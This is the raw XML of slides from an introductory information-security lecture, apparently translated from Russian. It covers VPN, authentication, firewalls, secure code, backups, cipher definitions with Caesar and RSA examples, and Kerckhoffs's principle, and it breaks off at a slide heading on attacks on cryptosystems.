              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Authentication:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>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special protocols for authentication and encryption key exchange, certificates</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Data integrity:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>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digital signature</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Local area network protection:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>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Firewalls (firewalls, firewalls), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, proxy servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>intrusion detection and network monitoring systems</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="313584" lvl="0" indent="-371994">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="669999"/>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19" algn="l"/>
                <a:tab pos="5729400" algn="l"/>
                <a:tab pos="6178680" algn="l"/>
                <a:tab pos="6627960" algn="l"/>
                <a:tab pos="7077240" algn="l"/>
                <a:tab pos="7526160" algn="l"/>
                <a:tab pos="7975440" algn="l"/>
                <a:tab pos="8424720" algn="l"/>
                <a:tab pos="8874000" algn="l"/>
                <a:tab pos="9323280" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legal measures</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs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FE7E9830-1695-4E55-BD74-75E02357F277}"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006EEA39-9A13-4C1F-8873-5732F004AF5F}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2"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Above All:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> Secure Code</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CustomShape 3" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8686440" cy="454320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Correct program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="669999"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>meets the specifications</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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Based on reasonable input data, it returns the correct result</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="648"/>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19" algn="l"/>
                <a:tab pos="5729400" algn="l"/>
                <a:tab pos="6178680" algn="l"/>
                <a:tab pos="6627960" algn="l"/>
                <a:tab pos="7077240" algn="l"/>
                <a:tab pos="7526160" algn="l"/>
                <a:tab pos="7975440" algn="l"/>
                <a:tab pos="8424720" algn="l"/>
                <a:tab pos="8874000" algn="l"/>
                <a:tab pos="9323280" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="0">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Secure Program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="669999"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>keeps working in the face of an attack</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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u="none" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> reasonable input at least does not lead to the death of the entire system</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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You can't manage without it</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="418211" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
              <a:tabLst>
                <a:tab pos="341280" algn="l"/>
                <a:tab pos="789120" algn="l"/>
                <a:tab pos="1238400" algn="l"/>
                <a:tab pos="1687680" algn="l"/>
                <a:tab pos="2136600" algn="l"/>
                <a:tab pos="2585880" algn="l"/>
                <a:tab pos="3035160" algn="l"/>
                <a:tab pos="3484440" algn="l"/>
                <a:tab pos="3933720" algn="l"/>
                <a:tab pos="4383000" algn="l"/>
                <a:tab pos="4832280" algn="l"/>
                <a:tab pos="5281560" algn="l"/>
                <a:tab pos="5730840" algn="l"/>
                <a:tab pos="6180120" algn="l"/>
                <a:tab pos="6629400" algn="l"/>
                <a:tab pos="7078680" algn="l"/>
                <a:tab pos="7527960" algn="l"/>
                <a:tab pos="7977240" algn="l"/>
                <a:tab pos="8426520" algn="l"/>
                <a:tab pos="8875800" algn="l"/>
                <a:tab pos="9325079" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Backup</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3983A4DC-18F8-4D3F-B993-8CEF84DEF16B}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4005360" y="1857240"/>
            <a:ext cx="4447800" cy="357156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rot="16199969">
            <a:off x="7434360" y="714240"/>
            <a:ext cx="914040" cy="4524120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr rot="5400000" vert="vert" lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="ctr">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4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="48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C269CCE1-4D40-4D02-A5AE-B5586332810C}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1785960" y="928800"/>
            <a:ext cx="5487480" cy="514944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What is a cipher?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="1566360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="3A68DC"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cipher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> - mapping a set of open data to a set of possible encrypted data</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A8340A16-D08B-48A8-A944-E97A899931C5}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5524560" y="3643200"/>
            <a:ext cx="3333240" cy="2409480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CustomShape 4" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428760" y="3571920"/>
            <a:ext cx="5000400" cy="1921320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:sp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000" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="3A68DC"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> — a cipher parameter that captures one bijective map from the set of all possible ones</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3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Examples</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="441144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Example 1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Caesar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)=x+k</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Key: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Example 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (RSA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (mod n)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Key: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>couple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(a, n)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Example 3:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)=ax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+bx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>+cx+d  (mod n)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Key: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="850AFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(a,b,c,d,n)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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171DCAA4-BD20-4562-8B0D-AA01BC32DD2C}"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Basic Principle</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="507168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The Kirchhoff principle:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the secret must be contained not in the encryption algorithm, but in the key used!</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Essence of the principle: </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the fewer secrets a system contains, the more secure it is</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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Example: if one of the system's secrets is revealed – the entire system has to be thrown away</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A555B66C-AB24-43BF-8C30-356D6F5188D4}"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Attacks on Cryptosystems</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="4785840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
